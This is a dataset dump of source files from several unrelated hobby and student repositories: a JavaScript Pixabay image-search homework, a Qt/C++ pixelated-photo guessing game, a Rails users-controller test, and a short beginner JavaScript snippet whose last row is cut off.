branch_name stringclasses 149 values | text stringlengths 23 89.3M | directory_id stringlengths 40 40 | languages listlengths 1 19 | num_files int64 1 11.8k | repo_language stringclasses 38 values | repo_name stringlengths 6 114 | revision_id stringlengths 40 40 | snapshot_id stringlengths 40 40 |
|---|---|---|---|---|---|---|---|---|
refs/heads/main | <repo_name>Lia-Pavlova/goit-js-hw-13-image-finder<file_sep>/src/js/.d.ts
declare module 'simplelightbox';<file_sep>/src/js/index.js
import '../sass/main.scss';
import PixabayApi from './apiService';
import galleryCards from '../templates/image-grid.hbs';
import { Notify } from 'notiflix';
import SimpleLightbox from 'simplelightbox';
import 'simplelightbox/src/simple-lightbox.scss';
const refs = {
galleryContainer: document.querySelector('.gallery'),
searchForm: document.querySelector('#search-form'),
};
const pixabayApi = new PixabayApi();
const gallery = new SimpleLightbox('.gallery a');
const observer = new IntersectionObserver((entries, observer) => {
entries.forEach(entry => {
if (entry.isIntersecting) {
fetchPhotos();
observer.unobserve(entry.target);
}
});
});
bindEvents();
function bindEvents() {
refs.searchForm.addEventListener('submit', onSearch);
}
function AddObserver() {
observer.observe(refs.galleryContainer.querySelector('li:last-child'));
}
function onSearch(e) {
e.preventDefault();
pixabayApi.query = refs.searchForm.query.value.trim();
clearGalleryContainer();
fetchPhotos(true);
}
async function fetchPhotos(isFirstQuery = false) {
try {
const data = await pixabayApi.getPhotos();
appendGalleryMarkup(data.hits);
if (isFirstQuery) {
if (data.totalHits) Notify.success(`Hooray! We found ${data.totalHits} images.`);
else {
Notify.failure('Sorry, there are no images matching your search query. Please try again.');
return;
}
}
if (data.hits.length < pixabayApi.perPage) {
Notify.info("We're sorry, but you've reached the end of search results.");
return;
}
AddObserver();
} catch (err) {
console.log(err);
Notify.failure(`Something went wrong(${err.message})`);
}
}
function appendGalleryMarkup(hits) {
const markup = galleryCards(hits);
refs.galleryContainer.insertAdjacentHTML('beforeend', markup);
gallery.refresh();
}
function clearGalleryContainer() {
refs.galleryContainer.innerHTML = '';
}<file_sep>/README.md
# goit-js-hw-13-image-finder
# Критерии приема
- Созданы репозитории `goit-js-hw-13-image-finder`.
- При сдаче домашней работы есть две ссылки для каждого проекта: на исходные
файлы и рабочую страницу на GitHub pages.
- При посещении рабочей страницы (GitHub pages) задания, в консоли нету ошибок и
предупреждений
- Имена переменных и функций понятные, описательные
- Проект собран с помощью
[parcel-project-template](https://github.com/goitacademy/parcel-project-template)
- Код отформатирован с помощью `Prettier`
- Добавь минимальную стилизацию
- Есть файл `apiService.js` с дефолтным экспортом объекта отвечающего за логику
HTTP-запросов к API
## Задание - поиск изображений
Напиши небольшое приложение поиска и просмотра изображений по ключевому слову
# Parcel boilerplate
## Скрытые файлы
Включите отображение скрытых файлов и папок в проводнике своей операционной системы, иначе вы не
сможете выбрать и скопировать себе файлы настроек проекта, имена которых начинаются с точки.
## Зависимости
На компьютере должена быть установлена LTS-версия [Node.js](https://nodejs.org/en/) со всеми
дополнительными инструментами кроме **Chocolatey** - его ставить не нужно.
## Перед началом работы
Один раз на проект установить все зависимости.
```shell
npm ci
```
### Разработка
Запустить режим разработки.
```shell
npm run dev
```
Во вкладке браузера перейти по адресу [http://localhost:1234](http://localhost:1234).
### Деплой
Сборка будет автоматически собирать и деплоить продакшен версию проекта на GitHub Pages, в ветку
`gh-pages`, каждый раз когда обновляется ветка `main`. Например, после прямого пуша или принятого
пул-реквеста. Для этого необходимо в файле `package.json` отредактировать поле `homepage` и скрипт
`build`, заменив `имя_пользователя` и `имя_репозитория` на свои.
```json
"homepage": "https://имя_пользователя.github.io/имя_репозитория",
"scripts": {
"build": "parcel build src/*.html --public-url /имя_репозитория/"
},
```
На всякий случай стоит зайти в настройки репозитория `Settings` > `Pages` и убедиться что продакшен
версии файлов раздаются из папки `/root` ветки `gh-pages`.
Через какое-то время живую страницу можно будет посмотреть по адресу указанному в отредактированном
свойстве `homepage`, например
[https://goitacademy.github.io/parcel-project-template](https://goitacademy.github.io/parcel-project-template).
## Файлы и папки
- Все паршалы файлов стилей должны лежать в папке `src/sass` и импортироваться в
`src/sass/main.scss`
- Изображения добавляйте в папку `src/images`, заранее оптимизировав их. Сборщик просто копирует
используемые изображения чтобы не нагружать систему оптимизацией картинок, так как на слабых
компьютерах это может занять много времени.
## Инструкции Pixabay API
Для HTTP-запросов используй публичный
[Pixabay API](https://pixabay.com/api/docs/). Зарегистрируйся и получи ключ.
URL-строка запроса:
```bash
https://pixabay.com/api/?image_type=photo&orientation=horizontal&q=что_искать&page=номер_страницы&per_page=12&key=твой_ключ
```
Pixabay API поддерживает пагинацию, пусть в ответе приходит по 12 объектов,
установлено в параметре `per_page`. По умолчанию параметр `page` равен `1`. При
каждом последующем запросе `page` увеличивается на 1, а при поиске по новому
ключевому слову необходимо сбрасывать его значение в `1`.
Каждое изобаржение описывается объектом.
```json
{
"comments": 78,
"downloads": 63296,
"favorites": 558,
"id": 1508613,
"imageHeight": 2135,
"imageSize": 1630104,
"imageWidth": 2894,
"largeImageURL": "https://pixabay.com/get/57e5d54b4c53af14f6da8c7dda793376173cd8e7524c704c702873dc9f44c551_1280.jpg",
"likes": 575,
"pageURL": "https://pixabay.com/photos/cat-animal-cat-portrait-cat-s-eyes-1508613/",
"previewHeight": 110,
"previewURL": "https://cdn.pixabay.com/photo/2016/07/10/21/47/cat-1508613_150.jpg",
"previewWidth": 150,
"tags": "cat, animal, cat portrait",
"type": "photo",
"user": "cocoparisienne",
"userImageURL": "https://cdn.pixabay.com/user/2018/11/26/11-06-29-714_250x250.jpg",
"user_id": 127419,
"views": 127450,
"webformatHeight": 472,
"webformatURL": "https://pixabay.com/get/57e5d54b4c53af14f6da8c7dda793376173cd8e7524c704c702873dc9f44c551_640.jpg",
"webformatWidth": 640
}
```
Тебе интересны следующие свойства:
- `webformatURL` - ссылка на маленькое изображение для списка карточек
- `largeImageURL` - ссылка на большое изображение (смотри пункт 'дополнительно')
- `likes` - количество лайков
- `views` - количество просмотров
- `comments` - количество комментариев
- `downloads` - количество загрузок
## Форма поиска
Создает DOM-элемент следующей структуры. Можно использовать шаблонизацию.
```html
<form class="search-form" id="search-form">
<input
type="text"
name="query"
autocomplete="off"
placeholder="Search images..."
/>
</form>
```
## Галерея изображений
Создает DOM-элемент следующей структуры.
```html
<ul class="gallery">
<!-- Список <li> с карточками изображений -->
</ul>
```
## Карточка изображения
Создает DOM-элемент следующей структуры.
```html
<div class="photo-card">
<img src="" alt="" />
<div class="stats">
<p class="stats-item">
<i class="material-icons">thumb_up</i>
1108
</p>
<p class="stats-item">
<i class="material-icons">visibility</i>
320321
</p>
<p class="stats-item">
<i class="material-icons">comment</i>
129
</p>
<p class="stats-item">
<i class="material-icons">cloud_download</i>
176019
</p>
</div>
</div>
```
Для иконок используются
[Material icons](https://google.github.io/material-design-icons/). Для их
корректной работы достаточно в HTML-файле добавить ссылку на веб-шрифт.
```html
<link
href="https://fonts.googleapis.com/icon?family=Material+Icons"
rel="stylesheet"
/>
```
Или добавив npm-пакет `material-design-icons` и импортировав веб-шрифт в
`index.js`.
## Кнопка 'Load more'
При нажатии на кнопку `Load more` должна догружаться следующая порция
изображений и рендериться вместе с предыдущими.
Страница должна автоматически плавно проскроливаться после рендера изображений,
чтобы перевести пользователя на следующие загруженные изображения. Используй
метод
[Element.scrollIntoView()](https://developer.mozilla.org/en-US/docs/Web/API/Element/scrollIntoView).
```js
const element = document.getElementById('.my-element-selector');
element.scrollIntoView({
behavior: 'smooth',
block: 'end',
});
```
## Дополнительно
- Можно добавить плагин нотификаций, например
[pnotify](https://github.com/sciactive/pnotify), и показывать нотификации на
результат HTTP-запросов
- Можно добавить функционал отображения большой версии изображения через плагин
модального окна, например
[basicLightbox](https://basiclightbox.electerious.com/), при клике на
изображение галереи
- Вместо кнопки `Load more` можно сделать бесконечную загрузку при скроле
используя `Intersection Observer`.
| f9ee33c604ba0fc2c942b81a7864bb20292c30b6 | [
"JavaScript",
"TypeScript",
"Markdown"
] | 3 | TypeScript | Lia-Pavlova/goit-js-hw-13-image-finder | 66d5d1802dd9e05e14f56791f0000776d6185904 | a2fd0c3760a084d0def9b0d443f6a254257e9184 |
refs/heads/master | <file_sep>#include "player.h"
#include "guess.h"
Player::Player(QString name)
{
this->name = name;
}
QString Player::getName() const
{
return name;
}
void Player::setName(const QString &value)
{
name = value;
}
void Player::addGuess(int personsGuessed, int score, QString fileName)
{
guesses.append(new Guess(personsGuessed, score, fileName));
}
int Player::getScore()
{
int result = 0;
for (Guess* g : guesses) {
result += g->getScore();
}
return result;
}
<file_sep>#ifndef CONFIGURATION_H
#define CONFIGURATION_H
#include <QVector>
#include <QSettings>
#include <QSharedDataPointer>
class ConfigurationData;
class Configuration {
public:
Configuration();
Configuration(const Configuration &other);
Configuration& operator=(const Configuration &other);
~Configuration();
void readSettings(QSettings &settings);
void writeSettings(QSettings &settings);
int getImageHeight() const;
void setImageHeight(int value);
int getImageWidth() const;
void setImageWidth(int value);
int getDuration() const;
void setDuration(int value);
QVector<int> getSizes() const;
void setSizes(const QVector<int> &value);
void showDialog();
private:
QSharedDataPointer<ConfigurationData> d;
};
#endif // CONFIGURATION_H
<file_sep>#ifndef IMAGESPAGE_H
#define IMAGESPAGE_H
#include <QWizardPage>
namespace Ui {
class ImagesPage;
}
class ImagesPage : public QWizardPage
{
Q_OBJECT
Q_PROPERTY(QStringList filenames READ filenames WRITE setFilenames NOTIFY filenamesChanged)
public:
explicit ImagesPage(QWidget *parent = 0);
~ImagesPage();
virtual bool isComplete() const override;
QStringList filenames();
public slots:
void setFilenames(QStringList list);
signals:
void filenamesChanged();
protected:
private:
Ui::ImagesPage *ui;
void addFilename(QString filename);
private slots:
void on_addFilesButton_clicked();
void on_removeButton_clicked();
};
#endif // IMAGESPAGE_H
<file_sep>#include "guessdialog.h"
#include "ui_guessdialog.h"
GuessDialog::GuessDialog(int score, QWidget *parent) :
QDialog(parent),
ui(new Ui::GuessDialog)
{
ui->setupUi(this);
ui->scoreLabel->setText(QString::number(score));
}
GuessDialog::~GuessDialog()
{
delete ui;
}
void GuessDialog::on_x1Button_clicked()
{
multi = 1;
accept();
}
void GuessDialog::on_x2Button_clicked()
{
multi = 2;
accept();
}
void GuessDialog::on_x3Button_clicked()
{
multi = 3;
accept();
}
int GuessDialog::getMulti() const
{
return multi;
}
<file_sep>#ifndef GUESS_H
#define GUESS_H
#include <QString>
class Guess {
public:
Guess(int personsGuessed, int score, QString fileName);
int getScore();
private:
int personsGuessed;
int score;
QString fileName;
};
#endif // GUESS_H
<file_sep>#ifndef GUESSDIALOG_H
#define GUESSDIALOG_H
#include <QDialog>
namespace Ui {
class GuessDialog;
}
class GuessDialog : public QDialog
{
Q_OBJECT
public:
explicit GuessDialog(int score, QWidget *parent = 0);
~GuessDialog();
int getMulti() const;
public slots:
void on_x1Button_clicked();
void on_x2Button_clicked();
void on_x3Button_clicked();
private:
Ui::GuessDialog *ui;
int multi;
};
#endif // GUESSDIALOG_H
<file_sep>#ifndef PIXELATOR_H
#define PIXELATOR_H
#include <vector>
#include <QPixmap>
struct QImage;
namespace gw {
class Pixelator {
public:
static QPixmap doPixelate(const QPixmap& source, const int pixelSize) noexcept;
private:
//Get a line of pixel's average greyness
//From x1 to (not including) x2
//From http://www.richelbilderbeek.nl
static QRgb getPixel(const QImage& image, const int x1, const int x2, const int y) noexcept;
//Get a square of pixels' average greyness
//From http://www.richelbilderbeek.nl
static QRgb getPixel(const QImage& image, const int x1, const int y1, const int x2, const int y2) noexcept;
//Set a square of pixels' color
//From http://www.richelbilderbeek.nl
static void setPixel(QImage& image, const int x1, const int y1, const int x2, const int y2, const QRgb color) noexcept;
//Set a line of pixel's color
//From http://www.richelbilderbeek.nl/CppSetPixel.htm
static void setPixel(QImage& image, const int x1, const int x2, const int y, const QRgb color) noexcept;
};
} //~namespace gw
#endif
<file_sep>#ifndef PLAYER_H
#define PLAYER_H
#include <QList>
class Guess;
class Player {
public:
Player(QString name);
private:
QString name;
QList<Guess*> guesses;
public:
void addGuess(int personsGuessed, int score, QString fileName);
int getScore();
QString getName() const;
void setName(const QString &value);
};
#endif // PLAYER_H
<file_sep>#ifndef GUESSWHO_H
#define GUESSWHO_H
#include <QMainWindow>
#include "configuration.h"
class Game;
class PlayerInfo;
class QPushButton;
class QLabel;
namespace Ui {
class GuessWho;
}
class GuessWho : public QMainWindow
{
Q_OBJECT
public:
explicit GuessWho(QWidget *parent = 0);
~GuessWho();
protected:
void closeEvent(QCloseEvent *event) override;
private:
Ui::GuessWho *ui;
Game *game = nullptr;
Configuration config;
QList<PlayerInfo*> infos;
QList<QPushButton*> buttons;
void readSettings();
void writeSettings();
void connectUI();
QLabel* pixelCountLabel;
signals:
void guessed(int player);
private slots:
void togglePlayerButtons(bool enabled);
void refreshImage(const QPixmap& image);
void updateInfo(const int playerIndex);
void showPlayerButtons();
void on_actionNewGame_triggered();
void on_actionSettings_triggered();
void on_showScoreButton_toggled();
void on_actionToggleControls_toggled(bool checked);
void on_toggleShowButton_toggled();
void on_nextButton_clicked();
void on_revealButton_clicked();
};
#endif // GUESSWHO_H
<file_sep>#include "settingsdialog.h"
#include "ui_settingsdialog.h"
#include "configuration.h"
SettingsDialog::SettingsDialog(const Configuration &settings, QWidget *parent) :
QDialog(parent),
ui(new Ui::SettingsDialog)
{
ui->setupUi(this);
ui->durationEdit->setText(QString::number(settings.getDuration()));
ui->imageHeightEdit->setText(QString::number(settings.getImageHeight()));
ui->imageWidthEdit->setText(QString::number(settings.getImageWidth()));
for (int size : settings.getSizes()) {
ui->pixelSizesList->addItem(QString::number(size));
}
}
SettingsDialog::~SettingsDialog()
{
delete ui;
}
int SettingsDialog::getDuration() const
{
return ui->durationEdit->text().toInt();
}
int SettingsDialog::getMaxHeight() const
{
return ui->imageHeightEdit->text().toInt();
}
int SettingsDialog::getMaxWidth() const
{
return ui->imageWidthEdit->text().toInt();
}
<file_sep>#ifndef GAME_H
#define GAME_H
#include <QObject>
#include <QVector>
#include <QPixmap>
#include <QTimer>
#include <QSettings>
#include "configuration.h"
namespace Ui {
class GameWizard;
}
class Player;
class QWizard;
class Game : public QObject
{
Q_OBJECT
public:
explicit Game(const Configuration &configuration, QObject *parent = 0);
QPixmap getScaledImage(const int index) const;
void start();
QList<Player *> getPlayers() const;
public slots:
void loadNextImage();
void showNextPixelated();
void startSlideshow();
void stopSlideshow();
void revealImage();
void showWizard();
void showGuessDialog(int player);
signals:
void imageChanged(const QPixmap& pixmap);
void wizardCompleted();
void guessCompleted(int playerIndex);
void uiChanged(bool enabled);
private:
int currentImageIndex = 0;
int pixelCountDown = 20;
int currentScore = 0;
QTimer timer;
QPixmap currentImage;
QStringList fileNames;
QList<Player*> players;
const Configuration &config;
Ui::GameWizard *wizardUi;
};
#endif // GAME_H
<file_sep>#include "pixelator.h"
#include <QImage>
QPixmap gw::Pixelator::doPixelate(const QPixmap& source, const int pixelSize) noexcept
{
const QImage imageOriginal { source.toImage() };
QImage imageResult { source.toImage() };
const int width = source.width();
const int height = source.height();
const int maxx = 1 + (width / pixelSize);
const int maxy = 1 + (height / pixelSize);
for (int y = 0; y != maxy; ++y) {
const int y1 = (y * pixelSize);
if (y1 >= height) continue;
const int y2 = std::min(y1 + pixelSize, height);
for (int x = 0; x != maxx; ++x) {
const int x1 = (x * pixelSize);
if (x1 >= width) continue;
const int x2 = std::min( x1 + pixelSize, width);
const QRgb p { getPixel(imageOriginal, x1, y1, x2, y2) };
setPixel(imageResult, x1, y1, x2, y2, p);
}
}
QPixmap result { QPixmap::fromImage(imageResult) };
return result;
}
QRgb gw::Pixelator::getPixel(const QImage& image, const int x1, const int x2, const int y) noexcept
{
const int nPixels = x2 - x1;
int sumRed = 0;
int sumGreen = 0;
int sumBlue = 0;
for (int x = x1; x != x2; ++x) {
const QRgb p { image.pixel(x,y) };
sumRed += qRed(p);
sumGreen += qGreen(p);
sumBlue += qBlue(p);
}
const int averageRed = sumRed / nPixels;
const int averageGreen = sumGreen / nPixels;
const int averageBlue = sumBlue / nPixels;
QRgb rgb { qRgb(averageRed,averageGreen,averageBlue) };
return rgb;
}
QRgb gw::Pixelator::getPixel(const QImage& image, const int x1, const int y1, const int x2, const int y2) noexcept
{
const int nPixelsVertical = y2 - y1;
int sumRed = 0;
int sumGreen = 0;
int sumBlue = 0;
for (int y = y1; y != y2; ++y) {
const QRgb p { getPixel(image,x1,x2,y) };
sumRed += qRed(p);
sumGreen += qGreen(p);
sumBlue += qBlue(p);
}
const int averageRed = sumRed / nPixelsVertical;
const int averageGreen = sumGreen / nPixelsVertical;
const int averageBlue = sumBlue / nPixelsVertical;
QRgb rgb { qRgb(averageRed, averageGreen, averageBlue) };
return rgb;
}
void gw::Pixelator::setPixel(QImage& image, const int x1, const int x2, const int y, const QRgb color) noexcept
{
for (int x = x1; x != x2; ++x) {
image.setPixel(x, y, color);
}
}
void gw::Pixelator::setPixel(QImage& image, const int x1, const int y1, const int x2, const int y2, const QRgb color) noexcept
{
for (int y = y1; y != y2; ++y) {
setPixel(image, x1, x2, y, color);
}
}
<file_sep>#include "guesswho.h"
#include "ui_guesswho.h"
#include "game.h"
#include "player.h"
#include "playerinfo.h"
#include <QSettings>
#include <QCloseEvent>
#include <QHBoxLayout>
#include <QPushButton>
#include <QAction>
GuessWho::GuessWho(QWidget *parent) :
QMainWindow(parent),
ui(new Ui::GuessWho)
{
ui->setupUi(this);
ui->infoWidget->setVisible(false);
QCoreApplication::setOrganizationName("linuxrelated");
QCoreApplication::setOrganizationDomain("linuxrelated.de");
QCoreApplication::setApplicationName("GuessWho");
readSettings();
QTimer::singleShot(0, this, &GuessWho::on_actionNewGame_triggered);
pixelCountLabel = new QLabel;
}
GuessWho::~GuessWho()
{
delete ui;
delete game;
}
void GuessWho::refreshImage(const QPixmap &image)
{
ui->imageLabel->setPixmap(image);
}
void GuessWho::updateInfo(const int playerIndex)
{
infos[playerIndex]->update();
togglePlayerButtons(false);
on_nextButton_clicked();
}
void GuessWho::showPlayerButtons()
{
auto players = game->getPlayers();
for (int i = 0; i < players.size(); ++i) {
// buttons
auto button = new QPushButton(players[i]->getName(), this);
button->setShortcut(tr("" + i + 1));
buttons += button;
ui->playerButtons->insertWidget(i, button);
connect(button, &QPushButton::clicked, this, [i, this]() {
emit guessed(i);
});
// infos
auto info = new PlayerInfo(players[i], this);
info->update();
infos += info;
auto layout = qobject_cast<QVBoxLayout*>(ui->infoWidget->layout());
layout->addWidget(info);
layout->addStretch();
}
ui->actionToggleControls->setChecked(true);
game->start();
}
void GuessWho::closeEvent(QCloseEvent *event)
{
writeSettings();
event->accept();
}
void GuessWho::readSettings()
{
QSettings settings;
settings.beginGroup("GuessWho");
resize(settings.value("size", QSize(400, 400)).toSize());
move(settings.value("pos", QPoint(200, 200)).toPoint());
settings.endGroup();
config.readSettings(settings);
}
void GuessWho::writeSettings()
{
QSettings settings;
settings.beginGroup("GuessWho");
settings.setValue("size", size());
settings.setValue("pos", pos());
settings.endGroup();
config.writeSettings(settings);
}
void GuessWho::connectUI()
{
//connect(ui->revealButton, &QPushButton::clicked, game, &Game::revealImage);
connect(game, &Game::imageChanged, this, &GuessWho::refreshImage);
connect(game, &Game::wizardCompleted, this, &GuessWho::showPlayerButtons);
connect(game, &Game::guessCompleted, this, &GuessWho::updateInfo);
connect(game, &Game::uiChanged, this, &GuessWho::togglePlayerButtons);
connect(this, &GuessWho::guessed, game, &Game::showGuessDialog);
}
void GuessWho::togglePlayerButtons(bool enabled)
{
for (auto button : buttons) {
button->setEnabled(enabled);
}
}
void GuessWho::on_actionNewGame_triggered()
{
ui->actionToggleControls->toggled(false);
if (game) {
delete game;
}
game = new Game(config, parent());
connectUI();
game->showWizard();
}
void GuessWho::on_actionSettings_triggered()
{
config.showDialog();
}
void GuessWho::on_showScoreButton_toggled()
{
auto layout = ui->imageLayout;
QLayoutItem* item = layout->itemAt(1);
auto widget = item->widget();
widget->setVisible(ui->showScoreButton->isChecked());
}
void GuessWho::on_actionToggleControls_toggled(bool checked)
{
ui->controlWidget->setVisible(checked);
}
void GuessWho::on_toggleShowButton_toggled()
{
if (ui->toggleShowButton->isChecked()) {
game->startSlideshow();
togglePlayerButtons(false);
ui->toggleShowButton->setText(tr("Stop Slideshow"));
ui->nextButton->setEnabled(false);
ui->revealButton->setEnabled(false);
} else {
game->stopSlideshow();
ui->toggleShowButton->setText(tr("Start Slideshow"));
ui->nextButton->setEnabled(true);
ui->revealButton->setEnabled(true);
}
}
void GuessWho::on_nextButton_clicked()
{
game->showNextPixelated();
togglePlayerButtons(false);
ui->revealButton->setEnabled(true);
}
void GuessWho::on_revealButton_clicked()
{
game->revealImage();
ui->revealButton->setEnabled(false);
}
<file_sep>#include "imagespage.h"
#include "ui_imagespage.h"
#include <QFileDialog>
#include <QListWidget>
ImagesPage::ImagesPage(QWidget *parent) :
QWizardPage(parent),
ui(new Ui::ImagesPage)
{
ui->setupUi(this);
registerField("imageFiles", this, "filenames");
ui->removeButton->setEnabled(isComplete());
}
ImagesPage::~ImagesPage()
{
delete ui;
}
void ImagesPage::on_addFilesButton_clicked()
{
QStringList fileNames = QFileDialog::getOpenFileNames(this, tr("Load images"), QDir::homePath(), (tr("Image files (*.jpg *.png)")));
if (!fileNames.isEmpty()) {
QStringList filesInList = filenames();
for (QString filename : fileNames) {
if (!filesInList.contains(filename)) {
addFilename(filename);
}
}
emit filenamesChanged();
}
}
void ImagesPage::on_removeButton_clicked()
{
qDeleteAll(ui->imageFilesList->selectedItems());
emit completeChanged();
ui->removeButton->setEnabled(isComplete());
}
bool ImagesPage::isComplete() const
{
return ui->imageFilesList->count() > 0;
}
QStringList ImagesPage::filenames()
{
QStringList result;
for (int i = 0; i < ui->imageFilesList->count(); ++i) {
result += ui->imageFilesList->item(i)->text();
}
return result;
}
void ImagesPage::setFilenames(QStringList list)
{
ui->imageFilesList->addItems(list);
}
void ImagesPage::addFilename(QString filename)
{
ui->imageFilesList->addItem(filename);
emit completeChanged();
}
<file_sep>#include "playerspage.h"
#include "ui_playerspage.h"
#include "ui_playerrow.h"
#include <QLineEdit>
#include <QFormLayout>
PlayersPage::PlayersPage(QWidget *parent) :
QWizardPage(parent),
ui(new Ui::PlayersPage)
{
ui->setupUi(this);
addPlayerRow();
}
PlayersPage::~PlayersPage()
{
delete ui;
}
int PlayersPage::getPlayerCount() const
{
return playerCount;
}
void PlayersPage::addPlayerRow()
{
QLineEdit *playerEdit = new QLineEdit(this);
ui->playersList->addRow(tr("&Name"), playerEdit);
registerField(QString("player") + QString::number(playerCount++), playerEdit);
if (playerCount == MAX_PLAYERS) {
ui->addPlayerButton->setEnabled(false);
}
playerEdit->setFocus();
}
void PlayersPage::on_addPlayerButton_clicked()
{
addPlayerRow();
}
<file_sep>#include "guess.h"
Guess::Guess(int personsGuessed, int score, QString fileName)
{
this->personsGuessed = personsGuessed;
this->score = score;
this->fileName = fileName;
}
int Guess::getScore()
{
return score * personsGuessed;
}
<file_sep>#include "game.h"
#include <QPixmap>
#include <QImageReader>
#include <QDialog>
#include <QPushButton>
#include "pixelator.h"
#include "player.h"
#include "guessdialog.h"
#include "ui_gamewizard.h"
Game::Game(const Configuration &configuration, QObject *parent) : QObject(parent), config(configuration)
{
connect(&timer, &QTimer::timeout, this, &Game::showNextPixelated);
}
QPixmap Game::getScaledImage(const int index) const
{
QImageReader ir(fileNames[index]);
ir.setAutoTransform(true);
QPixmap image { QPixmap::fromImageReader(&ir) };
return image.scaled(config.getImageWidth(), config.getImageHeight(), Qt::KeepAspectRatio, Qt::SmoothTransformation);
}
void Game::start()
{
currentImage = getScaledImage(0);
showNextPixelated();
emit uiChanged(false);
}
void Game::showNextPixelated()
{
if (pixelCountDown >= 0) {
QPixmap pixelated = gw::Pixelator::doPixelate(currentImage, config.getSizes()[pixelCountDown--]);
emit imageChanged(pixelated);
} else {
pixelCountDown = 0;
currentScore = 0;
revealImage();
}
}
void Game::startSlideshow()
{
timer.start(config.getDuration());
}
void Game::stopSlideshow()
{
timer.stop();
}
void Game::revealImage()
{
emit imageChanged(currentImage);
emit uiChanged(true);
currentScore = pixelCountDown + 2;
pixelCountDown = 20;
loadNextImage();
}
void Game::showWizard()
{
QWizard gameWizard;
wizardUi = new Ui::GameWizard;
wizardUi->setupUi(&gameWizard);
wizardUi->imagesPage->setTitle("Images");
wizardUi->playersPage->setTitle("Players");
if (gameWizard.exec()) {
fileNames = gameWizard.field("imageFiles").value<QStringList>();
for (int i = 0; i < wizardUi->playersPage->getPlayerCount(); ++i) {
players += new Player(gameWizard.field(QString("player") + QString::number(i)).toString());
}
emit wizardCompleted();
}
delete wizardUi;
}
void Game::showGuessDialog(int player)
{
GuessDialog dialog(currentScore);
if (dialog.exec()) {
players[player]->addGuess(dialog.getMulti(), currentScore, "");
emit guessCompleted(player);
emit uiChanged(false);
currentScore = 0;
}
}
QList<Player *> Game::getPlayers() const
{
return players;
}
void Game::loadNextImage()
{
if (++currentImageIndex < fileNames.size()) {
currentImage = getScaledImage(currentImageIndex);
} else {
currentImageIndex = -1;
loadNextImage();
}
}
<file_sep>#include "configuration.h"
#include "settingsdialog.h"
#include <QSharedData>
class ConfigurationData : public QSharedData
{
public:
ConfigurationData() {}
ConfigurationData(const ConfigurationData &other) : QSharedData(other) {}
~ConfigurationData() {}
int imageHeight = 0;
int imageWidth = 0;
int duration = 0;
QVector<int> sizes = { 2, 4, 5, 6, 7, 8, 10, 12, 14, 17, 21, 25, 30, 36, 43, 51, 62, 74, 89, 107, 128 };
//QVector<int> sizes = { 128, 107, 89, 74, 62, 51, 43, 36, 30, 25, 21, 17, 14, 12, 10, 8, 7, 6, 5, 4, 2 };
};
Configuration::Configuration()
{
d = new ConfigurationData;
}
Configuration::Configuration(const Configuration &other) : d(other.d)
{
}
Configuration &Configuration::operator=(const Configuration &other)
{
if (this == &other) return *this;
d = other.d;
return *this;
}
Configuration::~Configuration()
{
}
void Configuration::readSettings(QSettings &settings)
{
settings.beginGroup("Images");
d->imageWidth = settings.value("imageWidth", 1920).toInt();
d->imageHeight = settings.value("imageHeight", 1080).toInt();
d->duration = settings.value("duration", 1000).toInt();
settings.endGroup();
}
void Configuration::writeSettings(QSettings &settings)
{
settings.beginGroup("Images");
settings.setValue("imageWidth", d->imageWidth);
settings.setValue("imageHeight", d->imageHeight);
settings.setValue("duration", d->duration);
settings.endGroup();
}
int Configuration::getImageHeight() const
{
return d->imageHeight;
}
void Configuration::setImageHeight(int value)
{
d->imageHeight = value;
}
int Configuration::getImageWidth() const
{
return d->imageWidth;
}
void Configuration::setImageWidth(int value)
{
d->imageWidth = value;
}
int Configuration::getDuration() const
{
return d->duration;
}
void Configuration::setDuration(int value)
{
d->duration = value;
}
QVector<int> Configuration::getSizes() const
{
return d->sizes;
}
void Configuration::setSizes(const QVector<int> &value)
{
d->sizes = value;
}
void Configuration::showDialog()
{
SettingsDialog settingsDialog(*this);
if (settingsDialog.exec()) {
setDuration(settingsDialog.getDuration());
setImageHeight(settingsDialog.getMaxHeight());
setImageWidth(settingsDialog.getMaxWidth());
}
}
<file_sep>#ifndef PLAYERSPAGE_H
#define PLAYERSPAGE_H
#include <QWizardPage>
namespace Ui {
class PlayersPage;
}
class PlayersPage : public QWizardPage
{
Q_OBJECT
public:
explicit PlayersPage(QWidget *parent = 0);
~PlayersPage();
int getPlayerCount() const;
private:
Ui::PlayersPage *ui;
int playerCount = 0;
const int MAX_PLAYERS = 4;
void addPlayerRow();
private slots:
void on_addPlayerButton_clicked();
};
#endif // PLAYERSPAGE_H
<file_sep>#include "playerinfo.h"
#include "ui_playerinfo.h"
#include "player.h"
PlayerInfo::PlayerInfo(Player *player, QWidget *parent) :
QWidget(parent),
ui(new Ui::PlayerInfo)
{
ui->setupUi(this);
this->player = player;
}
PlayerInfo::~PlayerInfo()
{
delete ui;
}
void PlayerInfo::setPlayer(Player *player)
{
update();
}
void PlayerInfo::update()
{
ui->nameLabel->setText(player->getName());
ui->scoreLabel->setText(QString::number(player->getScore()));
}
| eb0c4d51d5080e3e32559c369fc244ab917e8329 | [
"C++"
] | 20 | C++ | freepenguin84/GuessWhoGame | aa21244a63ab41b97df15840826f84f5c17ce927 | 1818a4e80fff5e4373bc5d86c4be6a2af8eec9dc |
refs/heads/master | <file_sep>require "test_helper"
describe UsersController do
describe "auth_callback" do
it "logs in the first existing user and redirects them to the root path" do
expect{
perform_login
}.wont_change "User.count"
must_redirect_to root_path
expect(session[:user_id]).must_equal User.first.id
assert_equal "Logged in as returning user #{User.first.username}", flash[:result_text]
end
it "logs in a new user and redirects them back to the root path" do
user = User.new(
username: "jane",
provider: "github",
uid: 666,
email: "<EMAIL>",
)
expect {
perform_login(user)
}.must_change "User.count", 1
user = User.find_by(uid: user.uid)
must_redirect_to root_path
expect(session[:user_id]).must_equal user.id
assert_equal "Logged in as new user #{user.username}", flash[:result_text]
end
it "should redirect back to the root path for invalid callbacks" do
expect{
perform_login(User.new)
}.wont_change "User.count"
must_redirect_to root_path
expect(session[:user_id]).must_be_nil
assert_equal "Could not create new user account:", flash[:result_text]
end
end
end
| d1c216f6b876f27fe48d1efe38ff5ac7c10a7f0b | [
"Ruby"
] | 1 | Ruby | minipaige02/media-ranker-revisited | 088363505366976b27ea0427433e295b0f0066d6 | 08b6021d59c68a3f59eca8cfa1aacc4d1627a006 |
refs/heads/main | <file_sep>function sejaBemVindo(){
console.log("Seja Bem Vindo ao Curso de Javascript");
}
console.log("chamando a função seja bem vindo sejaBemVindo():");
sejaBemVindo();
//POO
var objProfessor ={
nome: "Prof. <NAME>",
curso: "Formação JavaScript",
mistrarAula: function(){
console.log("Ministrando aula de JavaScript");
}
};
console.log("objeto Professor");
